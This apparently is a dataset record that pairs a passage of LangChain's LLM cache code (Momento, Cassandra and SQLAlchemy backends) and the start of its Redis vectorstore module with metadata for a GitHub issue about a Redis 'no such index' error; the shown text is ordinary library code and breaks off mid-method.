cache.""" from gptcache import Cache for gptcache_instance in self.gptcache_dict.values(): gptcache_instance = cast(Cache, gptcache_instance) gptcache_instance.flush() self.gptcache_dict.clear() def _ensure_cache_exists(cache_client: momento.CacheClient, cache_name: str) -> None: """Create cache if it doesn't exist. Raises: SdkException: Momento service or network error Exception: Unexpected response """ from momento.responses import CreateCache create_cache_response = cache_client.create_cache(cache_name) if isinstance(create_cache_response, CreateCache.Success) or isinstance( create_cache_response, CreateCache.CacheAlreadyExists ): return None elif isinstance(create_cache_response, CreateCache.Error): raise create_cache_response.inner_exception else: raise Exception(f"Unexpected response cache creation: {create_cache_response}") def _validate_ttl(ttl: Optional[timedelta]) -> None: if ttl is not None and ttl <= timedelta(seconds=0): raise ValueError(f"ttl must be positive but was {ttl}.") class MomentoCache(BaseCache): """Cache that uses Momento as a backend. See https://gomomento.com/""" def __init__( self, cache_client: momento.CacheClient, cache_name: str, *, ttl: Optional[timedelta] = None, ensure_cache_exists: bool = True, ): """Instantiate a prompt cache using Momento as a backend. Note: to instantiate the cache client passed to MomentoCache, you must have a Momento account. See https://gomomento.com/. Args: cache_client (CacheClient): The Momento cache client. cache_name (str): The name of the cache to use to store the data. ttl (Optional[timedelta], optional): The time to live for the cache items. Defaults to None, ie use the client default TTL. ensure_cache_exists (bool, optional): Create the cache if it doesn't exist. Defaults to True. Raises: ImportError: Momento python package is not installed. TypeError: cache_client is not of type momento.CacheClientObject ValueError: ttl is non-null and non-negative """ try: from momento import CacheClient except ImportError: raise ImportError( "Could not import momento python package. " "Please install it with `pip install momento`." ) if not isinstance(cache_client, CacheClient): raise TypeError("cache_client must be a momento.CacheClient object.") _validate_ttl(ttl) if ensure_cache_exists: _ensure_cache_exists(cache_client, cache_name) self.cache_client = cache_client self.cache_name = cache_name self.ttl = ttl @classmethod def from_client_params( cls, cache_name: str, ttl: timedelta, *, configuration: Optional[momento.config.Configuration] = None, api_key: Optional[str] = None, auth_token: Optional[str] = None, # for backwards compatibility **kwargs: Any, ) -> MomentoCache: """Construct cache from CacheClient parameters.""" try: from momento import CacheClient, Configurations, CredentialProvider except ImportError: raise ImportError( "Could not import momento python package. " "Please install it with `pip install momento`." ) if configuration is None: configuration = Configurations.Laptop.v1() # Try checking `MOMENTO_AUTH_TOKEN` first for backwards compatibility try: api_key = auth_token or get_from_env("auth_token", "MOMENTO_AUTH_TOKEN") except ValueError: api_key = api_key or get_from_env("api_key", "MOMENTO_API_KEY") credentials = CredentialProvider.from_string(api_key) cache_client = CacheClient(configuration, credentials, default_ttl=ttl) return cls(cache_client, cache_name, ttl=ttl, **kwargs) def __key(self, prompt: str, llm_string: str) -> str: """Compute cache key from prompt and associated model and settings. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model version and settings. Returns: str: The cache key. """ return _hash(prompt + llm_string) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Lookup llm generations in cache by prompt and associated model and settings. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model version and settings. Raises: SdkException: Momento service or network error Returns: Optional[RETURN_VAL_TYPE]: A list of language model generations. """ from momento.responses import CacheGet generations: RETURN_VAL_TYPE = [] get_response = self.cache_client.get( self.cache_name, self.__key(prompt, llm_string) ) if isinstance(get_response, CacheGet.Hit): value = get_response.value_string generations = _load_generations_from_json(value) elif isinstance(get_response, CacheGet.Miss): pass elif isinstance(get_response, CacheGet.Error): raise get_response.inner_exception return generations if generations else None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Store llm generations in cache. Args: prompt (str): The prompt run through the language model. llm_string (str): The language model string. return_val (RETURN_VAL_TYPE): A list of language model generations. Raises: SdkException: Momento service or network error Exception: Unexpected response """ for gen in return_val: if not isinstance(gen, Generation): raise ValueError( "Momento only supports caching of normal LLM generations, " f"got {type(gen)}" ) key = self.__key(prompt, llm_string) value = _dump_generations_to_json(return_val) set_response = self.cache_client.set(self.cache_name, key, value, self.ttl) from momento.responses import CacheSet if isinstance(set_response, CacheSet.Success): pass elif isinstance(set_response, CacheSet.Error): raise set_response.inner_exception else: raise Exception(f"Unexpected response: {set_response}") def clear(self, **kwargs: Any) -> None: """Clear the cache. Raises: SdkException: Momento service or network error """ from momento.responses import CacheFlush flush_response = self.cache_client.flush_cache(self.cache_name) if isinstance(flush_response, CacheFlush.Success): pass elif isinstance(flush_response, CacheFlush.Error): raise flush_response.inner_exception CASSANDRA_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_cache" CASSANDRA_CACHE_DEFAULT_TTL_SECONDS = None class CassandraCache(BaseCache): """ Cache that uses Cassandra / Astra DB as a backend. It uses a single Cassandra table. The lookup keys (which get to form the primary key) are: - prompt, a string - llm_string, a deterministic str representation of the model parameters. (needed to prevent collisions same-prompt-different-model collisions) """ def __init__( self, session: Optional[CassandraSession] = None, keyspace: Optional[str] = None, table_name: str = CASSANDRA_CACHE_DEFAULT_TABLE_NAME, ttl_seconds: Optional[int] = CASSANDRA_CACHE_DEFAULT_TTL_SECONDS, skip_provisioning: bool = False, ): """ Initialize with a ready session and a keyspace name. Args: session (cassandra.cluster.Session): an open Cassandra session keyspace (str): the keyspace to use for storing the cache table_name (str): name of the Cassandra table to use as cache ttl_seconds (optional int): time-to-live for cache entries (default: None, i.e. forever) """ try: from cassio.table import ElasticCassandraTable except (ImportError, ModuleNotFoundError): raise ValueError( "Could not import cassio python package. " "Please install it with `pip install cassio`." ) self.session = session self.keyspace = keyspace self.table_name = table_name self.ttl_seconds = ttl_seconds self.kv_cache = ElasticCassandraTable( session=self.session, keyspace=self.keyspace, table=self.table_name, keys=["llm_string", "prompt"], primary_key_type=["TEXT", "TEXT"], ttl_seconds=self.ttl_seconds, skip_provisioning=skip_provisioning, ) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" item = self.kv_cache.get( llm_string=_hash(llm_string), prompt=_hash(prompt), ) if item is not None: generations = _loads_generations(item["body_blob"]) # this protects against malformed cached items: if generations is not None: return generations else: return None else: return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" blob = _dumps_generations(return_val) self.kv_cache.put( llm_string=_hash(llm_string), prompt=_hash(prompt), body_blob=blob, ) def delete_through_llm( self, prompt: str, llm: LLM, stop: Optional[List[str]] = None ) -> None: """ A wrapper around `delete` with the LLM being passed. In case the llm(prompt) calls have a `stop` param, you should pass it here """ llm_string = get_prompts( {**llm.dict(), **{"stop": stop}}, [], )[1] return self.delete(prompt, llm_string=llm_string) def delete(self, prompt: str, llm_string: str) -> None: """Evict from cache if there's an entry.""" return self.kv_cache.delete( llm_string=_hash(llm_string), prompt=_hash(prompt), ) def clear(self, **kwargs: Any) -> None: """Clear cache. This is for all LLMs at once.""" self.kv_cache.clear() CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC = "dot" CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD = 0.85 CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_semantic_cache" CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS = None CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE = 16 class CassandraSemanticCache(BaseCache): """ Cache that uses Cassandra as a vector-store backend for semantic (i.e. similarity-based) lookup. It uses a single (vector) Cassandra table and stores, in principle, cached values from several LLMs, so the LLM's llm_string is part of the rows' primary keys. The similarity is based on one of several distance metrics (default: "dot"). If choosing another metric, the default threshold is to be re-tuned accordingly. """ def __init__( self, session: Optional[CassandraSession], keyspace: Optional[str], embedding: Embeddings, table_name: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME, distance_metric: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC, score_threshold: float = CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD, ttl_seconds: Optional[int] = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS, skip_provisioning: bool = False, ): """ Initialize the cache with all relevant parameters. Args: session (cassandra.cluster.Session): an open Cassandra session keyspace (str): the keyspace to use for storing the cache embedding (Embedding): Embedding provider for semantic encoding and search. table_name (str): name of the Cassandra (vector) table to use as cache distance_metric (str, 'dot'): which measure to adopt for similarity searches score_threshold (optional float): numeric value to use as cutoff for the similarity searches ttl_seconds (optional int): time-to-live for cache entries (default: None, i.e. forever) The default score threshold is tuned to the default metric. Tune it carefully yourself if switching to another distance metric. """ try: from cassio.table import MetadataVectorCassandraTable except (ImportError, ModuleNotFoundError): raise ValueError( "Could not import cassio python package. " "Please install it with `pip install cassio`." ) self.session = session self.keyspace = keyspace self.embedding = embedding self.table_name = table_name self.distance_metric = distance_metric self.score_threshold = score_threshold self.ttl_seconds = ttl_seconds # The contract for this class has separate lookup and update: # in order to spare some embedding calculations we cache them between # the two calls. # Note: each instance of this class has its own `_get_embedding` with # its own lru. @lru_cache(maxsize=CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE) def _cache_embedding(text: str) -> List[float]: return self.embedding.embed_query(text=text) self._get_embedding = _cache_embedding self.embedding_dimension = self._get_embedding_dimension() self.table = MetadataVectorCassandraTable( session=self.session, keyspace=self.keyspace, table=self.table_name, primary_key_type=["TEXT"], vector_dimension=self.embedding_dimension, ttl_seconds=self.ttl_seconds, metadata_indexing=("allow", {"_llm_string_hash"}), skip_provisioning=skip_provisioning, ) def _get_embedding_dimension(self) -> int: return len(self._get_embedding(text="This is a sample sentence.")) def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update cache based on prompt and llm_string.""" embedding_vector = self._get_embedding(text=prompt) llm_string_hash = _hash(llm_string) body = _dumps_generations(return_val) metadata = { "_prompt": prompt, "_llm_string_hash": llm_string_hash, } row_id = f"{_hash(prompt)}-{llm_string_hash}" # self.table.put( body_blob=body, vector=embedding_vector, row_id=row_id, metadata=metadata, ) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" hit_with_id = self.lookup_with_id(prompt, llm_string) if hit_with_id is not None: return hit_with_id[1] else: return None def lookup_with_id( self, prompt: str, llm_string: str ) -> Optional[Tuple[str, RETURN_VAL_TYPE]]: """ Look up based on prompt and llm_string. If there are hits, return (document_id, cached_entry) """ prompt_embedding: List[float] = self._get_embedding(text=prompt) hits = list( self.table.metric_ann_search( vector=prompt_embedding, metadata={"_llm_string_hash": _hash(llm_string)}, n=1, metric=self.distance_metric, metric_threshold=self.score_threshold, ) ) if hits: hit = hits[0] generations = _loads_generations(hit["body_blob"]) if generations is not None: # this protects against malformed cached items: return ( hit["row_id"], generations, ) else: return None else: return None def lookup_with_id_through_llm( self, prompt: str, llm: LLM, stop: Optional[List[str]] = None ) -> Optional[Tuple[str, RETURN_VAL_TYPE]]: llm_string = get_prompts( {**llm.dict(), **{"stop": stop}}, [], )[1] return self.lookup_with_id(prompt, llm_string=llm_string) def delete_by_document_id(self, document_id: str) -> None: """ Given this is a "similarity search" cache, an invalidation pattern that makes sense is first a lookup to get an ID, and then deleting with that ID. This is for the second step. """ self.table.delete(row_id=document_id) def clear(self, **kwargs: Any) -> None: """Clear the *whole* semantic cache.""" self.table.clear() class FullMd5LLMCache(Base): # type: ignore """SQLite table for full LLM Cache (all generations).""" __tablename__ = "full_md5_llm_cache" id = Column(String, primary_key=True) prompt_md5 = Column(String, index=True) llm = Column(String, index=True) idx = Column(Integer, index=True) prompt = Column(String) response = Column(String) class SQLAlchemyMd5Cache(BaseCache): """Cache that uses SQAlchemy as a backend.""" def __init__( self, engine: Engine, cache_schema: Type[FullMd5LLMCache] = FullMd5LLMCache ): """Initialize by creating all tables.""" self.engine = engine self.cache_schema = cache_schema self.cache_schema.metadata.create_all(self.engine) def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: """Look up based on prompt and llm_string.""" rows = self._search_rows(prompt, llm_string) if rows: return [loads(row[0]) for row in rows] return None def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: """Update based on prompt and llm_string.""" self._delete_previous(prompt, llm_string) prompt_md5 = self.get_md5(prompt) items = [ self.cache_schema( id=str(uuid.uuid1()), prompt=prompt, prompt_md5=prompt_md5, llm=llm_string, response=dumps(gen), idx=i, ) for i, gen in enumerate(return_val) ] with Session(self.engine) as session, session.begin(): for item in items: session.merge(item) def _delete_previous(self, prompt: str, llm_string: str) -> None: stmt = ( select(self.cache_schema.response) .where(self.cache_schema.prompt_md5 == self.get_md5(prompt)) # type: ignore .where(self.cache_schema.llm == llm_string) .where(self.cache_schema.prompt == prompt) .order_by(self.cache_schema.idx) ) with Session(self.engine) as session, session.begin(): rows = session.execute(stmt).fetchall() for item in rows: session.delete(item) def _search_rows(self, prompt: str, llm_string: str) -> List[Row]: prompt_pd5 = self.get_md5(prompt) stmt = ( select(self.cache_schema.response) .where(self.cache_schema.prompt_md5 == prompt_pd5) # type: ignore .where(self.cache_schema.llm == llm_string) .where(self.cache_schema.prompt == prompt) .order_by(self.cache_schema.idx) ) with Session(self.engine) as session: return session.execute(stmt).fetchall() def clear(self, **kwargs: Any) -> None: """Clear cache.""" with Session(self.engine) as session: session.execute(self.cache_schema.delete()) @staticmethod def get_md5(input_string: str) -> str: return hashlib.md5(input_string.encode()).hexdigest()
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,197
Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"]
### System Info Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index". You'll get this exception while using redis as retriever: ![Screenshot from 2023-09-28 16-57-03](https://github.com/langchain-ai/langchain/assets/81446007/afae536e-7888-4183-93d0-bfa65a8845a2) ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ![Screenshot from 2023-09-28 16-13-18](https://github.com/langchain-ai/langchain/assets/81446007/281206ed-b7c6-4b18-a3cc-25874fec7a06) The error is here: ![Screenshot from 2023-09-28 16-32-00](https://github.com/langchain-ai/langchain/assets/81446007/f6bf52fb-d0ef-4f38-b247-475522bdfece) If you look for the index you'll get (empty list or set). This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason. I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps. ### Expected behavior Expected behavior inside Redis: "docs:indexname_:12ss2sadd"
https://github.com/langchain-ai/langchain/issues/11197
https://github.com/langchain-ai/langchain/pull/11257
079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a
d5c2ce7c2e1179907400f2c96fc6309a54cbce6a
"2023-09-28T19:57:36Z"
python
"2023-10-24T17:51:25Z"
libs/langchain/langchain/vectorstores/redis/base.py
"""Wrapper around Redis vector database.""" from __future__ import annotations import logging import os import uuid from typing import ( TYPE_CHECKING, Any, Callable, Dict, Iterable, List, Mapping, Optional, Tuple, Type, Union, cast, ) import numpy as np import yaml from langchain._api import deprecated from langchain.callbacks.manager import ( AsyncCallbackManagerForRetrieverRun, CallbackManagerForRetrieverRun, ) from langchain.docstore.document import Document from langchain.schema.embeddings import Embeddings from langchain.schema.vectorstore import VectorStore, VectorStoreRetriever from langchain.utilities.redis import ( _array_to_buffer, _buffer_to_array, check_redis_module_exist, get_client, ) from langchain.utils import get_from_dict_or_env from langchain.vectorstores.redis.constants import ( REDIS_REQUIRED_MODULES, REDIS_TAG_SEPARATOR, ) from langchain.vectorstores.utils import maximal_marginal_relevance logger = logging.getLogger(__name__) if TYPE_CHECKING: from redis.client import Redis as RedisType from redis.commands.search.query import Query from langchain.vectorstores.redis.filters import RedisFilterExpression from langchain.vectorstores.redis.schema import RedisModel def _redis_key(prefix: str) -> str: """Redis key schema for a given prefix.""" return f"{prefix}:{uuid.uuid4().hex}" def _redis_prefix(index_name: str) -> str: """Redis key prefix for a given index.""" return f"doc:{index_name}" def _default_relevance_score(val: float) -> float: return 1 - val def check_index_exists(client: RedisType, index_name: str) -> bool: """Check if Redis index exists.""" try: client.ft(index_name).info() except: # noqa: E722 logger.info("Index does not exist") return False logger.info("Index already exists") return True class Redis(VectorStore): """Redis vector database. To use, you should have the ``redis`` python package installed and have a running Redis Enterprise or Redis-Stack server For production use cases, it is recommended to use Redis Enterprise as the scaling, performance, stability and availability is much better than Redis-Stack. For testing and prototyping, however, this is not required. Redis-Stack is available as a docker container the full vector search API available. .. code-block:: bash # to run redis stack in docker locally docker run -d -p 6379:6379 -p 8001:8001 redis/redis-stack:latest Once running, you can connect to the redis server with the following url schemas: - redis://<host>:<port> # simple connection - redis://<username>:<password>@<host>:<port> # connection with authentication - rediss://<host>:<port> # connection with SSL - rediss://<username>:<password>@<host>:<port> # connection with SSL and auth Examples: The following examples show various ways to use the Redis VectorStore with LangChain. For all the following examples assume we have the following imports: .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings Initialize, create index, and load Documents .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings rds = Redis.from_documents( documents, # a list of Document objects from loaders or created embeddings, # an Embeddings object redis_url="redis://localhost:6379", ) Initialize, create index, and load Documents with metadata .. code-block:: python rds = Redis.from_texts( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object redis_url="redis://localhost:6379", ) Initialize, create index, and load Documents with metadata and return keys .. code-block:: python rds, keys = Redis.from_texts_return_keys( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object redis_url="redis://localhost:6379", ) For use cases where the index needs to stay alive, you can initialize with an index name such that it's easier to reference later .. code-block:: python rds = Redis.from_texts( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object index_name="my-index", redis_url="redis://localhost:6379", ) Initialize and connect to an existing index (from above) .. code-block:: python rds = Redis.from_existing_index( embeddings, # an Embeddings object index_name="my-index", redis_url="redis://localhost:6379", ) Advanced examples: Custom vector schema can be supplied to change the way that Redis creates the underlying vector schema. This is useful for production use cases where you want to optimize the vector schema for your use case. ex. using HNSW instead of FLAT (knn) which is the default .. code-block:: python vector_schema = { "algorithm": "HNSW" } rds = Redis.from_texts( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object vector_schema=vector_schema, redis_url="redis://localhost:6379", ) Custom index schema can be supplied to change the way that the metadata is indexed. This is useful for you would like to use the hybrid querying (filtering) capability of Redis. By default, this implementation will automatically generate the index schema according to the following rules: - All strings are indexed as text fields - All numbers are indexed as numeric fields - All lists of strings are indexed as tag fields (joined by langchain.vectorstores.redis.constants.REDIS_TAG_SEPARATOR) - All None values are not indexed but still stored in Redis these are not retrievable through the interface here, but the raw Redis client can be used to retrieve them. - All other types are not indexed To override these rules, you can pass in a custom index schema like the following .. code-block:: yaml tag: - name: credit_score text: - name: user - name: job Typically, the ``credit_score`` field would be a text field since it's a string, however, we can override this behavior by specifying the field type as shown with the yaml config (can also be a dictionary) above and the code below. .. code-block:: python rds = Redis.from_texts( texts, # a list of strings metadata, # a list of metadata dicts embeddings, # an Embeddings object index_schema="path/to/index_schema.yaml", # can also be a dictionary redis_url="redis://localhost:6379", ) When connecting to an existing index where a custom schema has been applied, it's important to pass in the same schema to the ``from_existing_index`` method. Otherwise, the schema for newly added samples will be incorrect and metadata will not be returned. """ DEFAULT_VECTOR_SCHEMA = { "name": "content_vector", "algorithm": "FLAT", "dims": 1536, "distance_metric": "COSINE", "datatype": "FLOAT32", } def __init__( self, redis_url: str, index_name: str, embedding: Embeddings, index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None, vector_schema: Optional[Dict[str, Union[str, int]]] = None, relevance_score_fn: Optional[Callable[[float], float]] = None, **kwargs: Any, ): """Initialize with necessary components.""" self._check_deprecated_kwargs(kwargs) try: # TODO use importlib to check if redis is installed import redis # noqa: F401 except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e self.index_name = index_name self._embeddings = embedding try: redis_client = get_client(redis_url=redis_url, **kwargs) # check if redis has redisearch module installed check_redis_module_exist(redis_client, REDIS_REQUIRED_MODULES) except ValueError as e: raise ValueError(f"Redis failed to connect: {e}") self.client = redis_client self.relevance_score_fn = relevance_score_fn self._schema = self._get_schema_with_defaults(index_schema, vector_schema) @property def embeddings(self) -> Optional[Embeddings]: """Access the query embedding object if available.""" return self._embeddings @classmethod def from_texts_return_keys( cls, texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, index_name: Optional[str] = None, index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None, vector_schema: Optional[Dict[str, Union[str, int]]] = None, **kwargs: Any, ) -> Tuple[Redis, List[str]]: """Create a Redis vectorstore from raw documents. This is a user-friendly interface that: 1. Embeds documents. 2. Creates a new Redis index if it doesn't already exist 3. Adds the documents to the newly created Redis index. 4. Returns the keys of the newly created documents once stored. This method will generate schema based on the metadata passed in if the `index_schema` is not defined. If the `index_schema` is defined, it will compare against the generated schema and warn if there are differences. If you are purposefully defining the schema for the metadata, then you can ignore that warning. To examine the schema options, initialize an instance of this class and print out the schema using the `Redis.schema`` property. This will include the content and content_vector classes which are always present in the langchain schema. Example: .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() redis, keys = Redis.from_texts_return_keys( texts, embeddings, redis_url="redis://localhost:6379" ) Args: texts (List[str]): List of texts to add to the vectorstore. embedding (Embeddings): Embeddings to use for the vectorstore. metadatas (Optional[List[dict]], optional): Optional list of metadata dicts to add to the vectorstore. Defaults to None. index_name (Optional[str], optional): Optional name of the index to create or add to. Defaults to None. index_schema (Optional[Union[Dict[str, str], str, os.PathLike]], optional): Optional fields to index within the metadata. Overrides generated schema. Defaults to None. vector_schema (Optional[Dict[str, Union[str, int]]], optional): Optional vector schema to use. Defaults to None. **kwargs (Any): Additional keyword arguments to pass to the Redis client. Returns: Tuple[Redis, List[str]]: Tuple of the Redis instance and the keys of the newly created documents. Raises: ValueError: If the number of metadatas does not match the number of texts. """ try: # TODO use importlib to check if redis is installed import redis # noqa: F401 from langchain.vectorstores.redis.schema import read_schema except ImportError as e: raise ImportError( "Could not import redis python package. " "Please install it with `pip install redis`." ) from e redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") if "redis_url" in kwargs: kwargs.pop("redis_url") # flag to use generated schema if "generate" in kwargs: kwargs.pop("generate") # see if the user specified keys keys = None if "keys" in kwargs: keys = kwargs.pop("keys") # Name of the search index if not given if not index_name: index_name = uuid.uuid4().hex # type check for metadata if metadatas: if isinstance(metadatas, list) and len(metadatas) != len(texts): # type: ignore # noqa: E501 raise ValueError("Number of metadatas must match number of texts") if not (isinstance(metadatas, list) and isinstance(metadatas[0], dict)): raise ValueError("Metadatas must be a list of dicts") generated_schema = _generate_field_schema(metadatas[0]) if index_schema: # read in the schema solely to compare to the generated schema user_schema = read_schema(index_schema) # the very rare case where a super user decides to pass the index # schema and a document loader is used that has metadata which # we need to map into fields. if user_schema != generated_schema: logger.warning( "`index_schema` does not match generated metadata schema.\n" + "If you meant to manually override the schema, please " + "ignore this message.\n" + f"index_schema: {user_schema}\n" + f"generated_schema: {generated_schema}\n" ) else: # use the generated schema index_schema = generated_schema # Create instance instance = cls( redis_url, index_name, embedding, index_schema=index_schema, vector_schema=vector_schema, **kwargs, ) # Create embeddings over documents embeddings = embedding.embed_documents(texts) # Create the search index instance._create_index(dim=len(embeddings[0])) # Add data to Redis keys = instance.add_texts(texts, metadatas, embeddings, keys=keys) return instance, keys @classmethod def from_texts( cls: Type[Redis], texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, index_name: Optional[str] = None, index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None, vector_schema: Optional[Dict[str, Union[str, int]]] = None, **kwargs: Any, ) -> Redis: """Create a Redis vectorstore from a list of texts. This is a user-friendly interface that: 1. Embeds documents. 2. Creates a new Redis index if it doesn't already exist 3. Adds the documents to the newly created Redis index. This method will generate schema based on the metadata passed in if the `index_schema` is not defined. If the `index_schema` is defined, it will compare against the generated schema and warn if there are differences. If you are purposefully defining the schema for the metadata, then you can ignore that warning. To examine the schema options, initialize an instance of this class and print out the schema using the `Redis.schema`` property. This will include the content and content_vector classes which are always present in the langchain schema. Example: .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() redisearch = RediSearch.from_texts( texts, embeddings, redis_url="redis://username:password@localhost:6379" ) Args: texts (List[str]): List of texts to add to the vectorstore. embedding (Embeddings): Embedding model class (i.e. OpenAIEmbeddings) for embedding queries. metadatas (Optional[List[dict]], optional): Optional list of metadata dicts to add to the vectorstore. Defaults to None. index_name (Optional[str], optional): Optional name of the index to create or add to. Defaults to None. index_schema (Optional[Union[Dict[str, str], str, os.PathLike]], optional): Optional fields to index within the metadata. Overrides generated schema. Defaults to None. vector_schema (Optional[Dict[str, Union[str, int]]], optional): Optional vector schema to use. Defaults to None. **kwargs (Any): Additional keyword arguments to pass to the Redis client. Returns: Redis: Redis VectorStore instance. Raises: ValueError: If the number of metadatas does not match the number of texts. ImportError: If the redis python package is not installed. """ instance, _ = cls.from_texts_return_keys( texts, embedding, metadatas=metadatas, index_name=index_name, index_schema=index_schema, vector_schema=vector_schema, **kwargs, ) return instance @classmethod def from_existing_index( cls, embedding: Embeddings, index_name: str, schema: Union[Dict[str, str], str, os.PathLike], **kwargs: Any, ) -> Redis: """Connect to an existing Redis index. Example: .. code-block:: python from langchain.vectorstores import Redis from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() redisearch = Redis.from_existing_index( embeddings, index_name="my-index", redis_url="redis://username:password@localhost:6379" ) Args: embedding (Embeddings): Embedding model class (i.e. OpenAIEmbeddings) for embedding queries. index_name (str): Name of the index to connect to. schema (Union[Dict[str, str], str, os.PathLike]): Schema of the index and the vector schema. Can be a dict, or path to yaml file **kwargs (Any): Additional keyword arguments to pass to the Redis client. Returns: Redis: Redis VectorStore instance. Raises: ValueError: If the index does not exist. ImportError: If the redis python package is not installed. """ redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") try: # We need to first remove redis_url from kwargs, # otherwise passing it to Redis will result in an error. if "redis_url" in kwargs: kwargs.pop("redis_url") client = get_client(redis_url=redis_url, **kwargs) # check if redis has redisearch module installed check_redis_module_exist(client, REDIS_REQUIRED_MODULES) # ensure that the index already exists assert check_index_exists( client, index_name ), f"Index {index_name} does not exist" except Exception as e: raise ValueError(f"Redis failed to connect: {e}") return cls( redis_url, index_name, embedding, index_schema=schema, **kwargs, ) @property def schema(self) -> Dict[str, List[Any]]: """Return the schema of the index.""" return self._schema.as_dict() def write_schema(self, path: Union[str, os.PathLike]) -> None: """Write the schema to a yaml file.""" with open(path, "w+") as f: yaml.dump(self.schema, f) @staticmethod def delete( ids: Optional[List[str]] = None, **kwargs: Any, ) -> bool: """ Delete a Redis entry. Args: ids: List of ids (keys in redis) to delete. redis_url: Redis connection url. This should be passed in the kwargs or set as an environment variable: REDIS_URL. Returns: bool: Whether or not the deletions were successful. Raises: ValueError: If the redis python package is not installed. ValueError: If the ids (keys in redis) are not provided """ redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") if ids is None: raise ValueError("'ids' (keys)() were not provided.") try: import redis # noqa: F401 except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) try: # We need to first remove redis_url from kwargs, # otherwise passing it to Redis will result in an error. if "redis_url" in kwargs: kwargs.pop("redis_url") client = get_client(redis_url=redis_url, **kwargs) except ValueError as e: raise ValueError(f"Your redis connected error: {e}") # Check if index exists try: client.delete(*ids) logger.info("Entries deleted") return True except: # noqa: E722 # ids does not exist return False @staticmethod def drop_index( index_name: str, delete_documents: bool, **kwargs: Any, ) -> bool: """ Drop a Redis search index. Args: index_name (str): Name of the index to drop. delete_documents (bool): Whether to drop the associated documents. Returns: bool: Whether or not the drop was successful. """ redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL") try: import redis # noqa: F401 except ImportError: raise ValueError( "Could not import redis python package. " "Please install it with `pip install redis`." ) try: # We need to first remove redis_url from kwargs, # otherwise passing it to Redis will result in an error. if "redis_url" in kwargs: kwargs.pop("redis_url") client = get_client(redis_url=redis_url, **kwargs) except ValueError as e: raise ValueError(f"Your redis connected error: {e}") # Check if index exists try: client.ft(index_name).dropindex(delete_documents) logger.info("Drop index") return True except: # noqa: E722 # Index not exist return False def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, embeddings: Optional[List[List[float]]] = None, batch_size: int = 1000, clean_metadata: bool = True, **kwargs: Any, ) -> List[str]: """Add more texts to the vectorstore. Args: texts (Iterable[str]): Iterable of strings/text to add to the vectorstore. metadatas (Optional[List[dict]], optional): Optional list of metadatas. Defaults to None. embeddings (Optional[List[List[float]]], optional): Optional pre-generated embeddings. Defaults to None. keys (List[str]) or ids (List[str]): Identifiers of entries. Defaults to None. batch_size (int, optional): Batch size to use for writes. Defaults to 1000. Returns: List[str]: List of ids added to the vectorstore """ ids = [] prefix = _redis_prefix(self.index_name) # Get keys or ids from kwargs # Other vectorstores use ids keys_or_ids = kwargs.get("keys", 